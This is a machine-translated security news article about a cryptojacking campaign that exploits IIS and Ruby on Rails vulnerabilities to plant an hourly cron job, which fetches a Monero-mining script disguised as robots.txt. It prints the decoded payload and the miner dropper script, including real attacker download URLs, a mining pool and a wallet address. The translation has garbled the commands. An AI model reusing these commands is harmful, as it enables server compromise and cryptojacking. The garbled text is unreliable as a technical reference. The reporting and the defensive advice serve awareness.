Attacks on Web servers: check your robots file .txt, because you can hide excavator Monero
Company Check Point observed attacks that use vulnerabilities in Web servers (Microsoft IIS and Ruby on Rails) to infection of a how many machines the script
XMRig Monero Exchange it for a while. A few hours after the publication of the first analysis, infected more than 700 servers around the world. Most us sites administrators are reprimanded, Germany, Great Britain, Norway and Sweden — although according to Check Point may not even be a country in which there are to infection.
If a server on one of the vulnerabilities (
CVE-2005-267 ) will be located, it first runs the code in the POST method, which gets the final payload:
The attacker to inject PHP code on the Ruby on Rails servers and Microsoft IIS uses the vulnerability CVE-2013-0156 and CVE-2005-2678 with the same payloadem as for Apache, but base64-encoded:
Decoded payload looks like this:
System ('crontab-r; wget-V & & echo "1 **** wget-q-O-< a href =" http://internetresearch.is/robots.txt "> http://internetresearch.is/robots.txt </a> 2 >/dev/null/dev/null > > 2 bash | & 1" | crontab-; wget-V || curl-V | echo "1 **** curl-s < a href =" http://internetresearch.is/robots.txt "> http://internetresearch.is/robots.txt </a> 2 >/dev/null/dev/null > > 2 bash | & 1" | crontab-')
The payload on the server executes the command
crontab –r that removes all of the remaining tasks and add your own:
echo "1 **** wget-q-O-hxxp://internetresearch.is/robots.txt 2 >/dev/null/dev/null > > 2 bash | & 1" | crontab-
So "infected" the server in the first minute of each hour trying to download the modified file robots. txt (normally used to block bots online e.g. in order to prevent indexing of the entire page or links) from the the domain, making it available online. "By the way" is the code you place in robots. txt, similar to this:
x86_64 = "http://internetresearch.is/sshd" i686 = "http://internetresearch.is/sshd.i686" touch test || CD/dev/shm || CD/tmp 2 >/dev/null > $MAIL & & chmod 000 $MAIL rm. test 2 >/dev/null > /dev/null 2, sshd rm pkill-9 xmrig 2 >/dev/null pid = $ (pgrep-f-o 'tQwSXfdLn 6avycd1bMp6RJTsNfwdPrMPWbz8 ') test $pid & & pgrep-f 'tQwSXfdLn 6avycd1bMp6RJTsNfwdPrMPWbz8 ' | grep-vw $pid | XARGS-r kill-9 pgrep-f tQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8 & & exit 0 wget--no-check-certificate ' $x 86_64 "-o. sshd | | curl-k "$x" 86_64-o. sshd wget--no-check-certificate ' $i 686 "-o. sshd. i686 || curl-k "$i 686"-o. sshd. i686 chmod + x. sshd. sshd. i686 pgrep-f hashvault | |. /.sshd-o pool.monero.hashvault.pro:5555-u 45e9rBtQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8crBXzPeGPLM6t8QE3s6JS5LNJUGMGmibF9yZhjVoCbUvz989EsT6h-p x-k-B || wget < a href = "http://lochjol.com/FAIL" > http://lochjol.com/FAIL </a>-O/dev/null--user-agent "$ (uname-r) ' | | curl < a href = "http://lochjol.com/FAIL" > http://lochjol.com/FAIL </a>--user-agent "$ (uname-r) ' pgrep-f hashvault | |. /.sshd.i686-o pool.monero.hashvault.pro:5555-u 45e9rBtQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8crBXzPeGPLM6t8QE3s6JS5LNJUGMGmibF9yZhjVoCbUvz989EsT6h-p x-k-B || wget < a href = "http://lochjol.com/FAIL" > http://lochjol.com/FAIL </a>-O/dev/null--user-agent "$ (uname-a)" || curl < a href = "http://lochjol.com/FAIL" > http://lochjol.com/FAIL </a>--user-agent "$ (uname-a)" < br/>
Experts indicate that the striker applied the trick to running code from a file robots. txt every hour, so you will be able to modify the commands and such. stop extracting Monero at any time (if necessary).
Based on the address of the portfolio Monero managed to determine that within 24 hours of zainfekowano approximately 700 servers, which gave attackers to 540 dollars of income.
Featured here the case is nothing new. More and more often among cybercriminals are seeing interest in monetyzowaniem this method by computer calculations. According to the statistics of ESET attackers adjust to trends and change phishing ransom by encrypting the files ransomware'm to kicking the refreshed. To confirm this thesis just have a look at the chart below for our country:
Similar an incident of a Digger Monero has recently any subverted website BlackBerry.com, as well as Polish news service Rzeczpospolita.pl
This and similar attacks can be prevented. Administrators we suggest you to care about the systematic application updates that are installed on the server, as well as scripts and extensions added to Web sites. Home users we recommend reputable antivirus software, but necessarily that has browser protection. Only in this way it will be possible to detect and block malicious script. People who do not want to use the AV, we recommend one of the ad blockerów (preferably uBlock) or an extension of the NoCoin, which is available for Chrome/Chromium, Firefox and Opera.
Learn more about our offer
We use Google Cloud Translation and Gengo API’s to translate articles with exception of our comparative tests.